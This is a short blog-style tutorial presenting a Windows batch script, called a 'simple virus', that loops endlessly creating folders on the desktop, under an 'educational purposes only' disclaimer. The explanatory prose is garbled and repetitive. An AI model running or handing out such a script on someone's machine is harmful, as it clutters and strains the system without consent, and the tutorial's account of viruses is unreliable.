Attention!
: Educational purposes only.
Today through EasyTricks
we're about to learn how to write a simple virus program. I'll tell you earlier
what Computer Virus is. If there is anyone who knows this Virus, if there is
one that I will briefly tell you. If someone knows if this Virus is unknown, I
will briefly tell you. A virus is a malicious software program. When a virus is
executed (Run, it can run it alone, modify the program in the program, and add
various codes to the virus by itself. Most of the time, this Virus is trying to
make another person a harassment or fun. Nevertheless, making a Virus would be
a bad thing. Easytricks,
Our aim to give you an insight into Virus. So if you use the Code on this page
to do a bad job and get caught, We do not take responsibility for it.
Educational purposes only.
We are using a Batch
program to build this Virus Program. A Batch program is called a script file in
Windows. In fact, a batch file is a bit of orderly commands. This is plain
text. You have seen the files in Windows Extension like .bat, .cmd, .btm. That
kind of files are called a batch script
See
the video below for more information on these commands and the Virus run.
We can use the Notepad
to create a batch file.
Step 1
First, open the Notepad.
There
are many ways to open the Notepad. I'm not going to explain it all. Click the
Start button in the Task Bar and just type Notepad. Click on result
at the top.
Step 2
Then
copy the text in the notepad below.
@echo off
Rem This is an example
of a simple virus
color a
echo Simple Example
echo EasyTricks
echo Educational purpose
only
cd %homepath%
cd Desktop
set VAL=100
md %VAL%
:Loop
set /a VAL=%VAL%+1
md %VAL%
goto loop
pause
Step 3
Now
save the text in the desktop as Virus.bat.
File >> Save
as >> Desktop >> Virus.bat
Step 4
Double-click on the
newly created program. it will create folders on desktop until you’ll stop the
program running . See the video so it's clear.
Download
files from here ...
Final Result
Here it is
Comments
Post a Comment